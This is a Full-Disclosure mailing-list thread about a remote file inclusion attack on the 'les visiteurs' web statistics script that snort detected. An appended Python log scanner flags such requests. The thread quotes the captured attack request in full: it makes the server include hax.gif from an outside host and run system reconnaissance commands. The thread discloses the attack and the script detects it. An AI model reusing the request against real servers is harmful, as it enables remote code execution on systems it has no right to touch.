
Re: [Full-Disclosure] file inclusion (les visiteurs)



Hi Lorenzo,
First there isn't *their server*. It's other stuff server (c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a php include to *inject* in the buggy 'les visiteurs' (web statistics program) remotely and execute shell commands.
And I don't think they are kiddies, if they wrote 'hax.gif', like it seems.
Don't blame people who are only intending to advise people about a bug that is being exploited.


Lorenzo Hernandez Garcia-Hierro wrote:

Hi Daniel,
They are kiddies... :(
I was looking at the files and there are only high-risk-rated exploits
downloaded from packet storm, ptrace, etc.
And they are running remote php shells in their server.... xD

See you in the IRC tonight?



"Evert Daman" <evert@digipix.org> wrote:



last night snort detected this request:

GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls


Because I patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of October nothing happened, but it looks like someone is
trying to exploit this bug.
Just want to mention it to this wonderful list :)





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
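
Added example, not part of the thread or of any poster's code: a small log check that flags requests like the one snort caught, where an include-path parameter carries a remote URL. The sample lines are constructed around the request quoted above; the parameter-name heuristic and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed request lines; the first uses the request target quoted in the thread.
SAMPLE_REQUESTS = [
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org"
    "/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls HTTP/1.0",
    "GET /counter/index.php?page=stats&ref=http%3A%2F%2Fexample.org%2F HTTP/1.1",
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=include/ HTTP/1.1",
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=hTTp%3A%2F%2Fhost.example%2Fx.txt%3F HTTP/1.1",
]

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
# Assumption: parameter names that normally hold a local include path.
INCLUDE_HINT = re.compile(r"include|inc|dir|path|file", re.I)

def decode_params(query):
    """Split on '&' only, so ';' inside a value (as in the thread) is kept."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name:
            params[unquote_plus(name)] = unquote_plus(value)
    return params

def inspect_request(request_line):
    """Return a finding dict for a remote-include attempt, else None."""
    fields = request_line.split(" ")
    if len(fields) < 2:
        return None
    target = urlsplit(fields[1])
    params = decode_params(target.query)
    for name, value in params.items():
        value = value.strip()
        # Decoding first means a percent-encoded scheme is still caught.
        if INCLUDE_HINT.search(name) and REMOTE_URL.match(value):
            return {
                "script": target.path,
                "param": name,
                "remote_host": urlsplit(value).hostname,
                "other_params": {k: v for k, v in params.items() if k != name},
            }
    return None

def scan(lines):
    return [f for f in map(inspect_request, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The decoded `other_params` show what the remote include was expected to run, which helps triage a hit against a patched versus unpatched install.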